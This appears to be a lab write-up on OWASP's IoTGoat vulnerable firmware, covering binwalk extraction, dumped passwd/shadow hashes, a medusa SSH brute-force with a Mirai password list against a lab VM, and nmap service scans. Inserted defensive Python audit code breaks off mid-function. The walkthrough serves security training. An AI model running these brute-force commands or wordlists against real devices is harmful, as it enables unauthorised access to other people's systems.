IoTGoat analysis lab

Notchicken 2021. 1. 14. 15:10

Lab environment: kali-linux-2020.4-vmware-amd64, IoTGoat-x86

www.kali.org/downloads/

github.com/OWASP/IoTGoat/releases

 

[Setting up the IoTGoat-x86 environment]

1. Download IoTGoat-x86.vmdk

Download: github.com/OWASP/IoTGoat/releases

 

2. Set up IoTGoat-x86 in VMware

- Create a New Virtual Machine > Typical > I will install the operating system later

 

- Type: Linux , Version: Linux 2.6 / 3.x / 4.x (32-bit)

 

- Choose the install path, then set the disk size to 10~15GB

 

- Replace the .vmdk file in the install path with the downloaded .vmdk file, then boot the VM (4GB of RAM recommended)


[Analyzing IoTGoat]

1. Obtaining user credentials hard-coded in the firmware

1) Extract the IoTGoat file system with binwalk

$ binwalk -eM IoTGoat-raspberry-pi2.img

Scan Time:     2021-01-14 00:54:42
Target File:   /home/kali/Desktop/IoTGoat-raspberry-pi2.img
MD5 Checksum:  9fb28986b3a610fe60f3927bc7dd643b
Signatures:    391

DECIMAL       HEXADECIMAL     DESCRIPTION
-------------------------------------------------------------------------------
4253711       0x40E80F        Copyright string: "copyright does *not* cover user programs that use kernel"
4253946       0x40E8FA        Copyright string: "copyrighted by the Free Software"
4254058       0x40E96A        Copyright string: "copyrighted by me and others who actually wrote it."
4254443       0x40EAEB        Copyright string: "Copyright (C) 1989, 1991 Free Software Foundation, Inc."
4256293       0x40F225        Copyright string: "copyright the software, and"
...
...
29360128      0x1C00000       Squashfs filesystem, little endian, version 4.0, compression:xz, size: 3946402 bytes, 1333 inodes, blocksize: 262144 bytes, created: 2019-01-30 12:21:02

 

2) Check the passwd file in the extracted folder

- Note that root and iotgoatuser both have the login shell /bin/ash

$ cat _IoTGoat-raspberry-pi2.img.extracted/squashfs-root/etc/passwd*
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
iotgoatuser:x:1000:1000::/root:/bin/ash

 

3) Check the shadow file

- Note the hash algorithm ($1 = md5) and the password hashes

$ cat _IoTGoat-raspberry-pi2.img.extracted/squashfs-root/etc/shadow*
root:$1$Jl7H1VOG$Wgw2F/C.nLNTC.4pwDa4H1:18145:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
iotgoatuser:$1$79bz0K8z$Ii6Q/if83F1QodGmkb4Ah.:18145:0:99999:7:::
root:$1$KzoHhzG9$wGyFXbWOcRChy3e.Ep2NY1:18080:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::

 

4) Crack the password with a brute-force tool

- Install SecLists (provides sensitive-data patterns, fuzzing payloads, web shells, etc.)

- Use the password list the Mirai botnet used

$ git clone https://github.com/danielmiessler/SecLists.git
Cloning into 'SecLists'...
remote: Enumerating objects: 9535, done.
remote: Total 9535 (delta 0), reused 0 (delta 0), pack-reused 9535
Receiving objects: 100% (9535/9535), 779.68 MiB | 10.81 MiB/s, done.
Resolving deltas: 100% (4948/4948), done.
Updating files: 100% (5336/5336), done.

 

- The provided mirai-botnet.txt stores (user, password) pairs, so regenerate the file keeping only the password column

$ ls
conficker.txt  mirai-botnet.txt

$ awk '{print $2}' mirai-botnet.txt > mirai-botnet_passwords.txt

 

- Attempt to crack the password with medusa

- Target: the IP of the running IoTGoat-x86 VM

$ medusa -u iotgoatuser -P mirai-botnet_passwords.txt -h 192.168.64.133 -M ssh               
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: xc3511 (1 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: vizxv (2 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: admin (3 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: admin (4 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 888888 (5 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: xmhdipc (6 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: default (7 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: jauntech (8 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 123456 (9 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 54321 (10 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: support (11 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: (none) (12 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: password (13 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: root (14 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 12345 (15 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: user (16 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: (none) (17 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: pass (18 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: admin1234 (19 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 1111 (20 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: smcadmin (21 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 1111 (22 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 666666 (23 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: password (24 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 1234 (25 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: klv123 (26 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: admin (27 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: service (28 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: supervisor (29 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: guest (30 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 12345 (31 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: password (32 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 1234 (33 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 666666 (34 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 888888 (35 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: ubnt (36 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: klv1234 (37 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: Zte521 (38 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: hi3518 (39 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: jvbzd (40 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: anko (41 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: zlxx. (42 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 7ujMko0vizxv (43 of 60 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.64.133 User: iotgoatuser Password: 7ujMko0vizxv [SUCCESS]

 

- Log in over ssh with the recovered password (iotgoatuser/7ujMko0vizxv)
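A defender-side counterpart to steps 2) to 4), added here as an example and not part of the original post: a Python audit of the passwd/shadow pair from the extracted squashfs-root that flags the conditions found by hand above (interactive shells, $1$ md5crypt hashes, an ordinary account whose home is /root, and the second root hash that `cat shadow*` pulled in from the shadow- backup). The function names, finding labels and shell/scheme tables are my own choices; the sample strings are copied from the listings above.

```python
"""Audit the passwd/shadow pair copied out of an extracted firmware root.

Added example, not part of the original post. Reports what the walk-through
finds by hand: accounts with a usable password and an interactive shell,
md5crypt ($1$) or DES hashes, empty password fields, non-root accounts holding
UID 0 or root's home directory, and accounts whose shadow entries disagree
(`cat shadow*` above also read the shadow- backup with an older root hash).
"""
from pathlib import Path

INTERACTIVE_SHELLS = {"/bin/ash", "/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh"}
WEAK_HASH_KINDS = {"empty", "md5crypt", "descrypt"}
UNUSABLE_HASH_KINDS = {"locked", "placeholder"}
HASH_SCHEMES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                "$y$": "yescrypt", "$7$": "scrypt", "$2a$": "bcrypt",
                "$2b$": "bcrypt", "$2y$": "bcrypt"}

# Constructed sample input: the passwd listing shown above, and the shadow
# listing abridged to shadow plus the shadow- copy of the root entry.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
iotgoatuser:x:1000:1000::/root:/bin/ash
"""
SHADOW_SAMPLE = """\
root:$1$Jl7H1VOG$Wgw2F/C.nLNTC.4pwDa4H1:18145:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
iotgoatuser:$1$79bz0K8z$Ii6Q/if83F1QodGmkb4Ah.:18145:0:99999:7:::
root:$1$KzoHhzG9$wGyFXbWOcRChy3e.Ep2NY1:18080:0:99999:7:::
"""


def parse_passwd(text):
    """Map account name -> {uid, gid, home, shell} from passwd(5) lines."""
    users = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or fields[0].startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def parse_shadow(text):
    """Map account name -> [password field, ...]; names repeat when shadow and shadow- are concatenated."""
    hashes = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 2 or not fields[0]:
            continue
        hashes.setdefault(fields[0], []).append(fields[1])
    return hashes


def classify_hash(field):
    """Name the crypt(3) scheme behind a shadow password field."""
    if field == "":
        return "empty"                 # no password at all
    if field.startswith(("*", "!")):
        return "locked"                # password login disabled
    if field == "x":
        return "placeholder"           # passwd-style pointer, no hash present
    for prefix, scheme in HASH_SCHEMES.items():
        if field.startswith(prefix):
            return scheme
    if len(field) == 13 and "$" not in field:
        return "descrypt"              # traditional 13-character DES crypt
    return "unknown"


def audit_accounts(passwd_text, shadow_text):
    """Return sorted (account, finding) pairs for the weaknesses described above."""
    users, shadow = parse_passwd(passwd_text), parse_shadow(shadow_text)
    findings = set()
    for name, u in users.items():
        fields = shadow.get(name, [])
        usable = {classify_hash(f) for f in fields} - UNUSABLE_HASH_KINDS
        for kind in usable & WEAK_HASH_KINDS:
            findings.add((name, "weak-hash:" + kind))
        if usable and u["shell"] in INTERACTIVE_SHELLS:
            findings.add((name, "interactive-shell"))
        if len(set(fields)) > 1:           # e.g. shadow and shadow- hold different hashes
            findings.add((name, "conflicting-shadow-entries"))
        if name != "root" and u["uid"] == 0:
            findings.add((name, "uid-0"))
        if name != "root" and u["home"] == "/root":
            findings.add((name, "root-home"))
    return sorted(findings)


def audit_extracted_root(root):
    """Run the audit on <root>/etc/passwd and <root>/etc/shadow (e.g. squashfs-root)."""
    root = Path(root)
    return audit_accounts((root / "etc/passwd").read_text(), (root / "etc/shadow").read_text())


if __name__ == "__main__":
    for user, finding in audit_accounts(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(f"{user:<12} {finding}")
```

Point `audit_extracted_root` at the binwalk output directory (for the image above, `_IoTGoat-raspberry-pi2.img.extracted/squashfs-root`). A password field classified as md5crypt or descrypt on an account with an interactive shell is the credential a firmware reviewer should get rotated and re-hashed with sha512crypt or yescrypt before release; the conflicting-shadow-entries finding matters because a shipped shadow- backup leaks a previous password hash as well.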

 

2. Obtaining service information with an nmap scan

1) Scan all ports to find the open services

$ nmap -p- -sT 192.168.64.133   # -p-: scan all ports, -sT: TCP open (connect) scan
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 02:25 EST
Nmap scan report for 192.168.64.133
Host is up (0.00098s latency).
Not shown: 65390 closed ports, 138 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
443/tcp   open  https
5000/tcp  open  upnp
5515/tcp  open  unknown
65534/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 2801.44 seconds

 

2) Version scan of the upnp service

- MiniUPnP 2.1

$ nmap -p5000 -sV 192.168.64.133
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 00:57 EST
WARNING: Service 192.168.64.133:5000 had already soft-matched upnp, but now soft-matched rtsp; ignoring second value
WARNING: Service 192.168.64.133:5000 had already soft-matched upnp, but now soft-matched sip; ignoring second value
Nmap scan report for 192.168.64.133
Host is up (0.00039s latency).

PORT     STATE SERVICE VERSION
5000/tcp open  upnp    MiniUPnP 2.1 (UPnP 1.1)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5000-TCP:V=7.91%I=7%D=1/15%Time=60012ECE%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,124,"\x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/
SF:html\r\nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\x20Op
SF:enWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HE
SF:AD><TITLE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Impl
SF:emented</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20
SF:this\x20server\.</BODY></HTML>\r\n")%r(GetRequest,117,"HTTP/1\.0\x20404
SF:\x20Not\x20Found\r\nContent-Type:\x20text/html\r\nConnection:\x20close\
SF:r\nContent-Length:\x20134\r\nServer:\x20OpenWRT/18\.06\.2\x20UPnP/1\.1\
SF:x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>404\x20Not\x20Found
SF:</TITLE></HEAD><BODY><H1>Not\x20Found</H1>The\x20requested\x20URL\x20wa
SF:s\x20not\x20found\x20on\x20this\x20server\.</BODY></HTML>\r\n")%r(RTSPR
SF:equest,12C,"RTSP/1\.0\x20501\x20Not\x20Implemented\r\nContent-Type:\x20
SF:text/html\r\nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\
SF:x20OpenWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTM
SF:L><HEAD><TITLE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x2
SF:0Implemented</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20b
SF:y\x20this\x20server\.</BODY></HTML>\r\n")%r(HTTPOptions,12C,"HTTP/1\.0\
SF:x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/html\r\nConnectio
SF:n:\x20close\r\nContent-Length:\x20149\r\nServer:\x20OpenWRT/18\.06\.2\x
SF:20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>501\x20
SF:Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Implemented</H1>The\x
SF:20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20this\x20server\.<
SF:/BODY></HTML>\r\n")%r(FourOhFourRequest,117,"HTTP/1\.0\x20404\x20Not\x2
SF:0Found\r\nContent-Type:\x20text/html\r\nConnection:\x20close\r\nContent
SF:-Length:\x20134\r\nServer:\x20OpenWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPn
SF:Pd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>404\x20Not\x20Found</TITLE></
SF:HEAD><BODY><H1>Not\x20Found</H1>The\x20requested\x20URL\x20was\x20not\x
SF:20found\x20on\x20this\x20server\.</BODY></HTML>\r\n")%r(SIPOptions,12B,
SF:"SIP/2\.0\x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/html\r\
SF:nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\x20OpenWRT/1
SF:8\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TIT
SF:LE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Implemented
SF:</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20this\x2
SF:0server\.</BODY></HTML>\r\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds

 

3) Scan for details with nmap's broadcast-upnp-info script

- Webserver: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1

Reference: nmap.org/nsedoc/scripts/broadcast-upnp-info.html

$ nmap -sV --script=broadcast-upnp-info 192.168.64.133
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 01:02 EST
Pre-scan script results:
| broadcast-upnp-info: 
|   239.255.255.250
|       Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|       Location: http://192.168.64.133:5000/rootDesc.xml
|         Webserver: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|         Name: OpenWRT router
|         Manufacturer: OpenWRT
|         Model Descr: OpenWRT router
|         Model Name: OpenWRT router
|         Model Version: 1
|         Name: WANDevice
|         Manufacturer: MiniUPnP
|         Model Descr: WAN Device
|         Model Name: WAN Device
|         Model Version: 20190130
|         Name: WANConnectionDevice
|         Manufacturer: MiniUPnP
|         Model Descr: MiniUPnP daemon
|         Model Name: MiniUPnPd
|_        Model Version: 20190130
WARNING: Service 192.168.64.133:5000 had already soft-matched upnp, but now soft-matched rtsp; ignoring second value
WARNING: Service 192.168.64.133:5000 had already soft-matched upnp, but now soft-matched sip; ignoring second value
Nmap scan report for 192.168.64.133
Host is up (0.00042s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      Dropbear sshd (protocol 2.0)
53/tcp   open  domain   dnsmasq 2.73
80/tcp   open  http     LuCI Lua http config
443/tcp  open  ssl/http LuCI Lua http config
5000/tcp open  upnp     MiniUPnP 2.1 (UPnP 1.1)
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html
|     Connection: close
|     Content-Length: 134
|     Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|     Ext:
|     <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL was not found on this server.</BODY></HTML>
|   GenericLines: 
|     501 Not Implemented
|     Content-Type: text/html
|     Connection: close
|     Content-Length: 149
|     Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|     Ext:
|     <HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>
|   HTTPOptions: 
|     HTTP/1.0 501 Not Implemented
|     Content-Type: text/html
|     Connection: close
|     Content-Length: 149
|     Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|     Ext:
|     <HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>
|   RTSPRequest: 
|     RTSP/1.0 501 Not Implemented
|     Content-Type: text/html
|     Connection: close
|     Content-Length: 149
|     Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|     Ext:
|     <HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>
|   SIPOptions: 
|     SIP/2.0 501 Not Implemented
|     Content-Type: text/html
|     Connection: close
|     Content-Length: 149
|     Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
|     Ext:
|_    <HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5000-TCP:V=7.91%I=7%D=1/15%Time=60013014%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,124,"\x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/
SF:html\r\nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\x20Op
SF:enWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HE
SF:AD><TITLE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Impl
SF:emented</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20
SF:this\x20server\.</BODY></HTML>\r\n")%r(GetRequest,117,"HTTP/1\.0\x20404
SF:\x20Not\x20Found\r\nContent-Type:\x20text/html\r\nConnection:\x20close\
SF:r\nContent-Length:\x20134\r\nServer:\x20OpenWRT/18\.06\.2\x20UPnP/1\.1\
SF:x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>404\x20Not\x20Found
SF:</TITLE></HEAD><BODY><H1>Not\x20Found</H1>The\x20requested\x20URL\x20wa
SF:s\x20not\x20found\x20on\x20this\x20server\.</BODY></HTML>\r\n")%r(RTSPR
SF:equest,12C,"RTSP/1\.0\x20501\x20Not\x20Implemented\r\nContent-Type:\x20
SF:text/html\r\nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\
SF:x20OpenWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTM
SF:L><HEAD><TITLE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x2
SF:0Implemented</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20b
SF:y\x20this\x20server\.</BODY></HTML>\r\n")%r(HTTPOptions,12C,"HTTP/1\.0\
SF:x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/html\r\nConnectio
SF:n:\x20close\r\nContent-Length:\x20149\r\nServer:\x20OpenWRT/18\.06\.2\x
SF:20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>501\x20
SF:Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Implemented</H1>The\x
SF:20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20this\x20server\.<
SF:/BODY></HTML>\r\n")%r(FourOhFourRequest,117,"HTTP/1\.0\x20404\x20Not\x2
SF:0Found\r\nContent-Type:\x20text/html\r\nConnection:\x20close\r\nContent
SF:-Length:\x20134\r\nServer:\x20OpenWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPn
SF:Pd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>404\x20Not\x20Found</TITLE></
SF:HEAD><BODY><H1>Not\x20Found</H1>The\x20requested\x20URL\x20was\x20not\x
SF:20found\x20on\x20this\x20server\.</BODY></HTML>\r\n")%r(SIPOptions,12B,
SF:"SIP/2\.0\x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/html\r\
SF:nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\x20OpenWRT/1
SF:8\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TIT
SF:LE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Implemented
SF:</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20this\x2
SF:0server\.</BODY></HTML>\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.40 seconds
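An added example, not part of the post, that parses the port tables printed by the scans above in Python and diffs them against an assumed service baseline for an OpenWrt/LuCI image, so a re-scan after a firmware change can be compared with what the device is supposed to expose. `EXPECTED_PORTS`, the function names and the result keys are my constructions; the sample strings are copied from the scan output above.

```python
"""Diff nmap's normal-output port table against an expected-service baseline.

Added example, not from the post. Parses lines such as
"5000/tcp open  upnp  MiniUPnP 2.1 (UPnP 1.1)" and reports open ports absent
from the baseline, ports nmap could not name, baseline ports that were not
seen, and the version banners observed.
"""
import re

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Assumed baseline for this OpenWrt/LuCI image: Dropbear, dnsmasq, LuCI over
# http/https and miniupnpd. Replace with the device's documented services.
EXPECTED_PORTS = {22, 53, 80, 443, 5000}

# Constructed input: the two port tables printed by the scans above.
FULL_SCAN = """\
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
443/tcp   open  https
5000/tcp  open  upnp
5515/tcp  open  unknown
65534/tcp open  unknown
"""
VERSION_SCAN = """\
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      Dropbear sshd (protocol 2.0)
53/tcp   open  domain   dnsmasq 2.73
80/tcp   open  http     LuCI Lua http config
443/tcp  open  ssl/http LuCI Lua http config
5000/tcp open  upnp     MiniUPnP 2.1 (UPnP 1.1)
"""


def parse_nmap_ports(text):
    """Return [{port, proto, state, service, version}] from nmap normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": (version or "").strip()})
    return ports


def diff_against_baseline(ports, expected=EXPECTED_PORTS):
    """Compare open ports with the baseline; 'unnamed' are ports nmap could not identify."""
    open_ports = [p for p in ports if p["state"].startswith("open")]
    seen = {p["port"] for p in open_ports}
    return {
        "unexpected": sorted(seen - expected),
        "unnamed": sorted(p["port"] for p in open_ports
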